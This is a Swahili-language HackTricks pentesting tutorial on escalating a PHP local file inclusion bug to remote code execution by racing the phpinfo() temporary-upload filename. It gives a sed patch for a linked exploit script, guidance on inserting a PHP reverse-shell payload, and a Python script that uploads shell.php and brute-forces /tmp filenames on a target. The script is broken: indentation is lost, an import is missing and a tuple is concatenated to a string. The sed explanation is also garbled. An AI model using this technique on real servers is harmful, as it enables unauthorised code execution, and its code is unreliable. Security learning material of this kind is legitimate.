hacktricks/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>


Kuweza kutumia udhaifu huu unahitaji: **Udhaifu wa LFI, ukurasa ambapo phpinfo() inaonyeshwa, "file\_uploads = on" na seva inapaswa kuweza kuandika kwenye saraka ya "/tmp".**

[https://www.insomniasec.com/downloads/publications/phpinfolfi.py](https://www.insomniasec.com/downloads/publications/phpinfolfi.py)

**Mafunzo HTB**: [https://www.youtube.com/watch?v=rs4zEwONzzk\&t=600s](https://www.youtube.com/watch?v=rs4zEwONzzk\&t=600s)

Unahitaji kusahihisha udukuzi (badilisha **=>** na **=>**). Unaweza kufanya hivyo kwa:
```
sed -i 's/\[tmp_name\] \=>/\[tmp_name\] =\&gt/g' phpinfolfi.py
```
Lazima ubadilishe pia **payload** mwanzoni mwa shambulizi (kwa mfano, kwa php-rev-shell), **REQ1** (inapaswa kuashiria ukurasa wa phpinfo na lazima iwe na padding iliyomo, yaani: _REQ1 = """POST /install.php?mode=phpinfo\&a="""+padding+""" HTTP/1.1_), na **LFIREQ** (inapaswa kuashiria udhaifu wa LFI, yaani: _LFIREQ = """GET /info?page=%s%%00 HTTP/1.1\r --_ Angalia "%" mara mbili wakati wa kutumia null char)

{% file src="../../.gitbook/assets/LFI-With-PHPInfo-Assistance.pdf" %}

### Nadharia

Ikiwa kupakia kuruhusiwa katika PHP na unajaribu kupakia faili, faili hii hifadhiwa katika saraka ya muda mpaka seva imemaliza kusindika ombi, kisha faili hii ya muda inafutwa.

Kwa hivyo, ikiwa umepata udhaifu wa LFI kwenye seva ya wavuti, unaweza kujaribu kuhadithia jina la faili ya muda iliyoundwa na kudukua RCE kwa kufikia faili ya muda kabla haijafutwa.

Katika **Windows**, faili kawaida hifadhiwa katika **C:\Windows\temp\php**

Katika **linux**, jina la faili hutumiwa kuwa **la nasibu** na liko katika **/tmp**. Kwa kuwa jina ni la nasibu, ni muhimu **kutolea mahali jina la faili ya muda** na kufikia kabla haijafutwa. Hii inaweza kufanywa kwa kusoma thamani ya **variable $\_FILES** ndani ya maudhui ya kazi "**phpconfig()**".

**phpinfo()**

**PHP** hutumia buffer ya **4096B** na wakati inapokuwa **imejaa**, inatumwa kwa mteja. Kisha mteja anaweza **kutuma** **ombi nyingi kubwa** (kwa kutumia vichwa vikubwa) **kupakia php** reverse **shell**, kusubiri **sehemu ya kwanza ya phpinfo() irudishwe** (ambapo jina la faili ya muda iko) na kujaribu **kufikia faili ya muda** kabla ya seva ya php kufuta faili hiyo kwa kutumia udhaifu wa LFI.

**Script ya Python kujaribu kuvunja jina (ikiwa urefu = 6)**
```python
import itertools
import requests
import sys

print('[+] Trying to win the race')
f = {'file': open('shell.php', 'rb')}
for _ in range(4096 * 4096):
requests.post('http://target.com/index.php?c=index.php', f)


print('[+] Bruteforcing the inclusion')
for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
url = 'http://target.com/index.php?c=/tmp/php' + fname
r = requests.get(url)
if 'load average' in r.text:  # <?php echo system('uptime');
print('[+] We have got a shell: ' + url)
sys.exit(0)

print('[x] Something went wrong, please try again')
```
<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>